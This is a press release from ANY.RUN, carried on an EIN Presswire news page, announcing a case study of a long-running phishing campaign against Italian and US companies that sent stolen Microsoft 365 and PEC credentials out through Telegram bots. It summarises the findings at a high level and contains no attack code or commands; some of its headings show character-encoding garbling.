logo
Questions? +1 (202) 335-3939 Login
Set Up FREE Account Submit Release
Trusted News Since 1995
A service for global professionals · Wednesday, May 21, 2025 · 814,878,095 Articles · 3+ Million Readers
Got News to Share? Send 2 FREE Releases
News Search | All News Topics > UNFPA News Topics: By Country | By State ; Press Releases by Industry Channel > All UNFPA Press Releases

ANY.RUN Exposes Long-Running Phishing Campaign Targeting Italian and US Companies

DUBAI, DUBAI, UNITED ARAB EMIRATES, May 21, 2025 /EINPresswire.com/ -- ANY.RUN, a leader in cybersecurity solutions, has released a new case study exposing a long-running phishing campaign that uses Telegram bots for credential exfiltration. By applying a previously documented message interception technique, analysts uncovered attacker-controlled infrastructure dating back to 2022, targeting Microsoft 365 and PEC users through low-effort phishing pages hosted on platforms like Notion and Glitch.

饾悇饾惐饾惄饾悮饾惂饾悵饾悽饾惂饾悹 饾悤饾悽饾惉饾悽饾悰饾悽饾惀饾悽饾惌饾惒 饾悡饾悺饾惈饾惃饾惍饾悹饾悺 饾悡饾悶饾惀饾悶饾悹饾惈饾悮饾惁 饾悂饾惃饾惌 饾悎饾惂饾惌饾悶饾惈饾悳饾悶饾惄饾惌饾悽饾惃饾惂

Using Telegram鈥檚 API, the team was able to intercept and analyze live data exfiltration flows, giving them rare visibility into the attacker鈥檚 operations. This pivot turned a single sandbox session into a broader investigation, revealing credential theft across multiple regions, repeated bot infrastructure reuse, and signs that the campaign is driven by access brokers rather than highly advanced threat actors.

饾悐饾悶饾惒 饾悡饾悮饾悿饾悶饾悮饾惏饾悮饾惒饾惉 饾悷饾惈饾惃饾惁 饾惌饾悺饾悶 饾悅饾悮饾惉饾悶 饾悞饾惌饾惍饾悵饾惒

Key insights from this in-depth case study include:

路 Telegram bots were used as exfiltration channels, with hardcoded tokens and chat IDs embedded in phishing scripts

路 Campaign impersonates Microsoft OneNote, Outlook, and Italy鈥檚 PEC system

路 Hosted on low-cost/free infrastructure: Notion, Glitch, RenderForest, and others

路 One of the attacks targeted Italian companies, including A&D, Steelsystem Building, Gruppo Amag, and others.

路 Threat activity traced from 2022 to 2025, still active at the time of publication

路 Victims span industries like logistics, utilities, finance, and digital identity

路 ANY.RUN shares detection assets: IOCs, YARA rules, Suricata rules, and Telegram analysis scripts

路 Attribution remains uncertain, but patterns suggest credential resale and access brokering

To explore the full technical analysis, including Telegram bot scripts, victim profiling, and detection recommendations, visit ANY.RUN鈥檚 blog.

饾悁饾悰饾惃饾惍饾惌 饾悁饾悕饾悩.饾悜饾悢饾悕

ANY.RUN is a cybersecurity provider offering a suite of advanced tools for malware analysis and threat intelligence. Its interactive sandbox supports real-time analysis across Windows, Linux, and Android environments, giving security professionals hands-on visibility into malicious behavior. Trusted by over 15,000 companies worldwide, ANY.RUN also offers comprehensive Threat Intelligence solutions, including TI Lookup, Feeds, and YARA Search, to help teams detect threats faster and respond with confidence.

The ANY.RUN team
ANYRUN FZCO
+1 657-366-5050
email us here
Visit us on social media:
LinkedIn
YouTube
X

Powered by EIN Presswire

Distribution channels: Banking, Finance & Investment Industry, Business & Economy, IT Industry, International Organizations, Technology

Legal Disclaimer:

EIN Presswire provides this news content "as is" without warranty of any kind. We do not accept any responsibility or liability for the accuracy, content, images, videos, licenses, completeness, legality, or reliability of the information contained in this article. If you have any complaints or copyright issues related to this article, kindly contact the author above.

Submit your press release

UNFPA News Today by EIN Newsdesk & EIN Presswire (a press release distribution service)

Follow us on Facebook and connect with us on LinkedIn

Newsmatics Inc., 1025 Connecticut Avenue NW, Suite 1000, Washington, DC 20036 · Contact · About

© 1995-2025 Newsmatics Inc., a publisher of EIN News · All Rights Reserved · Privacy Policy · User Agreement